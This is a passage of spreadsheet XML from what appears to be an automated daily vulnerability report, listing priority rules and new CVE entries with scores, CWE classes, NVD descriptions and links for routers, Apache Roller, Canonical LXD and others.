      <c r="A18" s="2" t="inlineStr">
        <is>
          <t>From OSV.dev</t>
        </is>
      </c>
      <c r="B18" s="3" t="n">
        <v>91</v>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="2" t="inlineStr"/>
      <c r="B19" s="3" t="inlineStr"/>
    </row>
    <row r="20">
      <c r="A20" s="2" t="inlineStr">
        <is>
          <t>Daily bucketing rule</t>
        </is>
      </c>
      <c r="B20" s="3" t="inlineStr">
        <is>
          <t>New = published during this report window. Older CVEs remain in their original publication-day report.</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="2" t="inlineStr">
        <is>
          <t>Update rule</t>
        </is>
      </c>
      <c r="B21" s="3" t="inlineStr">
        <is>
          <t>Older items are shown only when a meaningful security-related change is detected.</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="2" t="inlineStr"/>
      <c r="B22" s="3" t="inlineStr"/>
    </row>
    <row r="23">
      <c r="A23" s="2" t="inlineStr">
        <is>
          <t>Priority rules</t>
        </is>
      </c>
      <c r="B23" s="3" t="inlineStr"/>
    </row>
    <row r="24">
      <c r="A24" s="2" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B24" s="3" t="inlineStr">
        <is>
          <t>In CISA KEV, or EPSS &gt;= 0.50, or SSVC exploitation = active</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="2" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B25" s="3" t="inlineStr">
        <is>
          <t>CVSS &gt;= 9.0, or CVSS &gt;= 7.0 with EPSS &gt;= 0.10, or SSVC exploitation = poc</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="2" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B26" s="3" t="inlineStr">
        <is>
          <t>CVSS &gt;= 7.0</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="2" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B27" s="3" t="inlineStr">
        <is>
          <t>Everything else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6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CVE-2026-101072</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr"/>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr"/>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr"/>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Netcore NR289-GE 1.4.5102. This issue affects the function system of the file /ap_ip.cgi of the component CGI Handler. Such manipulation of the argument ip leads to os command injection. The attack can be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101072</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101076</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Netcore NR289-GE 1.4.5102. This affects the function system of the file /set_ntp_server_ip.cgi of the component CGI Handler. The manipulation of the argument ntp_ip results in os command injection. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101076</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101077</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Netcore NR289-GE 1.4.5102. This impacts the function process_request of the component boa_temp Handler. This manipulation causes missing authentication. The attack is possible to be carried out remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101077</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102240</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Netcore NAP930 0.1.241010.141410. This affects the function eval of the file /www/cgi-bin/network_tools of the component Network Tools CGI. The manipulation of the argument sid results in os command injection. The attack may be performed from remote. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102240</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101037</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="inlineStr"/>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr"/>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in FAST FAC1200R 5.0_20201119_1.0.2. Affected is the function parse_advertisement_frame of the component devdiscover Service. The manipulation results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101037</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101038</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr"/>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in FAST FAC1200R 5.0_20201119_1.0.2. Affected by this vulnerability is the function MmtAtePrase of the component MmtAtePrase Parser. This manipulation causes stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101038</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82377</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization in Apache Roller 6.1.5 allows an authenticated user to read, modify, or delete weblog content belonging to other weblogs through the legacy XML-RPC Blogger and MetaWeblog APIs, because the handlers authenticate the caller but do not verify the caller's permission on the weblog or entry actually affected. Only installations that enable the non-default global XML-RPC setting are affected; the per-weblog API flag defaults to enabled for UI-created weblogs. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which applies an explicit per-method permission check, or to keep the XML-RPC feature disabled.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82377</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85526</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>security@ubuntu.com</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>Path traversal in the Btrfs storage driver (unpackVolume) in Canonical LXD on Linux allows an authenticated user with instance creation privileges to delete or replace arbitrary files and directories on the host filesystem as root via a crafted subvolumes[].path entry in backup/optimized_header.yaml during a btrfs optimized backup import.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85526</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87799</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>security@ubuntu.com</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution in the migration receive path in Canonical LXD versions 4.0 and later (fixed in 4.0.14, 5.0.10, 5.21.8 and 6.10) on Linux allows an authenticated client that can create instances or custom storage volumes in a project, or a malicious migration source server, to write attacker-controlled files to arbitrary paths on the target host as root, leading to full host compromise. The attacker does this with a crafted rsync or btrfs send stream that plants a symlink in the transferred volume, such as rootfs or root.img, and then writes through it.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87799</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82384</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr">
        <is>
          <t>requests, rust</t>
        </is>
      </c>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>Deserialization of Untrusted Data in Apache Roller 6.1.5 allows an unauthenticated remote attacker to cause deserialization of attacker-controlled bytes, because the XML-RPC endpoint accepts vendor extension types that are deserialized during request parsing, before authentication. The servlet is mapped unconditionally, so parsing occurs even when the global XML-RPC feature is set to disabled; no non-default configuration is required for this path. This can lead to remote code execution. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which disables the extension types and rejects requests when the XML-RPC feature is disabled.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82384</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90924</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr"/>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>CWE-1392</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>Use of default credentials vulnerability in Innotim Software, Telecommunications and Consultancy Trade Ltd. Co. Logsign SIEM allows Try Common or Default Usernames and Passwords.
This issue affects Logsign SIEM: from 6.4.101 before 6.4.117.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90924</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101354</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr"/>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in FAST FAC1203R 20200116_2.0.4. The affected element is the function _tWlanTask of the component MmtAtePrase Parser. Performing a manipulation results in stack-based buffer overflow. The attacker must have access to the local network to execute the attack. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101354</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12342</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>psirt@sailpoint.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>This vulnerability
impacts all versions of IdentityIQ and allows an unauthenticated user remote
code execution on the IdentityIQ server due to improper input validation of
submitted web service API content.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12342</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85185</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>security@ubuntu.com</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr"/>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>Path traversal in the btrfs storage driver in Canonical LXD versions 4.0.2 and later (fixed in 4.0.14, 5.0.10, 5.21.8 and 6.10) on Linux allows an authenticated client with permission to create instances in a project to delete arbitrary files on the host as root. On hosts whose root filesystem is btrfs, the client can also place attacker-controlled content at arbitrary host paths, leading to full host compromise. The client does this with a crafted subvolume path containing ../ sequences, sent in either of two ways: in the optimized_header.yaml of an optimized btrfs backup, or in the btrfs migration header sent by a malicious migration source.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85185</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88804</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>suse</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
